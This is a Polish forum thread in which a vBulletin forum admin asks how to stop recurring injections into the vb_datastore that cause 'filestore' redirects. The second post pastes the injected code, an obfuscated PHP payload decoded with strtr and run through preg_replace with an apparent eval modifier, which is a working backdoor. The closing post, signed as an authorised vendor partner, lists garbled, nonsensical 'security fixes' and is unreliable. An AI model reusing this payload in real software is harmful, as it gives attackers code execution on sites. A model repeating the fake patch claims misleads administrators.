-
filestore i dodatkowy problem
Witam,
jakis rok temu mialem ataki na forum z uwagi na włączone register globals,
w koncu sie z tym uporalem (tak myslalem) az tu nagle w niedziele znowu to samo mimo ze reg off,
powoli trace siły i niedobrze mi sie robi na mysl o tym calym vb i vbseo, na phpbb mialem mniej problemów,
dodatkowo teraz widze cos jeszcze nie tak z linkami, tzn niby vbseo dziala, jednak na forum wszystko jest w wersji
/showthread.php?t=24692 i dopiero po kliknieciu przekierowanie na przyjazny link - ma ktos pomysl jak to zmienic? :/
no i jak skutecznie pozbyć sie tego przekierowania filestore, bo jak na razie to tylko loguje sie co kilka godzin wprawdzajac vb_datastore czy znow nie dopisało mi tego śmiecia :/ rece juz mi opadaja i ciarki na plecach przechodza :/
pozdrawiam i dziekuje za pomoc[COLOR="Silver"]
[SIZE=1]---------- Wiadomość dopisana o 17:28 ----------[/SIZE]
[/COLOR]ok, z linkami juz sobie poradzilem, zresetowalem datastore przez check_pluginlist.php i ruszylo
zostalo tylko to zabezpieczenie forum przez tym szajsem "filestore" :/
-
$o = 'b74c41f67a29845aa411a8091b327899';
$vbg = 'U`XtJ*~XzUc;GPUZuPUJkFMak<t-XBaT&/qY}<t?V"&C~?sgX|a-/<B;X/sgZQKRZ.RnUQ{SVHPRX/sd~"[@/<BQZ?aQZQZzDHR!kFMuk<S`&CatZYk`ZYDY#Ohn}ACn&elnZAstPHKR/Cf^>C{~k"aPV.ttP?[zV"klZ<><s[aR&|s`&">uZA{Q/Ak`POMTVH{j>Ma,B[zR~CgnV.R!kF>aqFfQ&|Pj~|[g+<KukQse~A{rZAfn&"BQj"sQ+/PzjFszP/kdjFtl~?{tUHsnkQdR/Cs[>t&[>tzY.[{>>[aB>gB./g[F{>@>kCgn}Q{T^>fd+/kT&BaCZ?duk[a,{Bk|{Bk~kgl>B[fj>RB"{Bk[>ePPV,zRPOChkFs~k<l`ZAqY/,zRZ7ChZFkt&Cao+/{7XHKYv<SnP?BZ#?s`~/SY~<aY~"BZ#YS@+|l`~Cd-j"kn~?Z-+<aojFtl~?{tU[d-ZYBrZ?[o+?StZtd-ZYBr+?[n&FBZ#esnkQdRPHR!k"KaqH{j>gB.BRB.|QPvB[{q/gl^>CqY/,zRZOChqga^.gt[/Cf.{>&k|OzR+,ChBMlk>Ca,qCkk>[qa^,gY~|tT+QZ!k"DakFh-k<SlZA{<X/snPHZ!k";akFh-k<Sl~?PjX|qY}Q{@^>f`Z?qu{RtD{Ba|{Bk,.>a}V,;CD,zRU7Ct~/fgU.KR/Cs[>t&[>tzY.[{>>[a+/gC^|ePPV,zRX7gY^Fs7Z?tdPHfgU/ft^.kg&/lg#<nlP?[T+AknZFqevFsQ+TgekQ;RP?kC~"StP"t-#,@`ZF{n~<@T|QPe+YBQ~HPP#eZ`~|tT+Q@dXFh6Zl%J;!(6P7gY#e{<+YBz~"BgX|;o^?adP"t`~Ys~kAsn~/fz&/&tZYsn~<;Y/.;Yk?[oZOoY^|nTv7;r#As7Z?tdPO;Y}<t?V"BoZF{@VH{jqga^.gt[|Q{-/.RnU<t?VH{lke&nZAstPHKR/gP[B[zYPePPV.+?V"tTZ<BgVH{j{gB>|QPYkCgnV.+?VH[t~/fgU.KR/gs^,gok{BzR+CgnV.t!X|+ukFqa^.{uV/on&eKRUetT&/{7~<a%X|>uk";zk<B-kQSgX|CtVHR%DT+dDOhn}Q{o^/sC+YsgZelo&O>uk"Kn#Ohz}HR!ZFkn~Yquv?{`+ABo&|@g#?S`+<[gX|a-^.PuPF{d}er`~/t?X|StZA{`Z?>-+<ao#<{`P<@z~<[R#YfuZOan&OC!k"CakQvn}ACtU"tg}ACn&eKuv.{CV.+?kFvnU<t?VH{@V/zR{gS^qR[D>CzYP"BoZ"SlP"BjX"a`XQPP|QPu&|[RX|@7~FBR&Ba2+/&lZ<sQX/fgkCg-^.{2}ACt~FstUQ{F,MaHq>S,|QPTPFtz&.PP|QP7ZADY/.;ak"u!j/Ca((1';
$xml = '$z#rB&_K=ZN;Es4tA6xgw/dof05eU~`:[k3{^ycF}<JbqGM7V!1au,l*.+H8@%j(>C9YT)PR?"X-pQni]LDmO|W2vISh';
$xml2 = '&sL8VZ`g[c+4]N~l3.:0}XwtB>=iebv/FJ*RP,6HO2(?Q_EjK7;9oTh@SYC!5rf)U1{nz#dkmGau^yp$<|M%DW-qI"xA';
$as = '#c#'.substr($vbg, 365, 1);
$vbt = preg_replace($as, strtr($vbg, $xml, $xml2), 'css');[COLOR="Silver"]
[SIZE=1]---------- Wiadomość dopisana o 14:43 ----------[/SIZE]
[/COLOR]czy jest tu ktos kto wie jak zabezpieczyc forum przed tym kurestwem w datastore?
i ile by chcial za takie zlecenie zabezpieczenia forum przed tym raz na zawsze?
-
witam,
dnia 14.08.2013 do naszej głównej dystrybucji VB wprowadziliśmy poprawki zabezpieczeń HTDS. Oto one:
- plik post.php zabezpieczony markowaniem wstecznym ***a.P (wp-data.err)
- plik mods-generate.isapi od teraz a niezmienne chmod 110.A!!!!!!!!!!!!!!!!!!!!
- dodaliśmy obowiązkową captchę natywną.
- odseparowaliśmy tabelę postów od tabeli użytkowników.
Na wszystkich pinach została uruchomiona automatyczna aktualizacja skryptu.
Pozdrawiam,
CROMSoft.
Autoryzowany partner Jelsoft